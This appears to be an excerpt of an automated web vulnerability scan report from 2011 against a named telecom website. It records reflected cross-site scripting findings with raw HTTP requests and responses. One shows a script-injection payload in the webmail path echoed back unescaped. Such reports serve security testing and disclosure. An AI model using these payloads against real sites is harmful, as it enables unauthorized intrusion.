1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.integratelecom |
Path: | /care/manage_isp_account |
GET /care/manage_isp_account Host: www.integratelecom.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=64696951 |
HTTP/1.1 200 OK Date: Fri, 04 Mar 2011 18:34:13 GMT Server: Apache X-Powered-By: PHP/5.2.6 Content-Type: text/html Content-Length: 16708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <titl ...[SNIP]... <input type="hidden" name="lastpage" value="/care/manage_isp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.integratelecom |
Path: | /care/webmail.php |
GET /care/webmail.php/337f4"><script>alert(1)< Host: www.integratelecom.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=64696951 |
HTTP/1.1 200 OK Date: Fri, 04 Mar 2011 18:34:12 GMT Server: Apache X-Powered-By: PHP/5.2.6 Content-Type: text/html Content-Length: 16702 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <titl ...[SNIP]... <input type="hidden" name="lastpage" value="/care/webmail.php/337f4"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.integratelecom |
Path: | /js/jquery.cookie.js |
GET /js/jquery.cookie.js HTTP/1.1 Host: www.integratelecom.com Proxy-Connection: keep-alive Referer: http://www.integratelecom Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 04 Mar 2011 18:33:58 GMT Server: Apache Last-Modified: Wed, 16 Jun 2010 23:45:19 GMT ETag: "fbfc7c-1096-508161c0" Accept-Ranges: bytes Content-Length: 4246 Content-Type: application/x-javascript /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]... |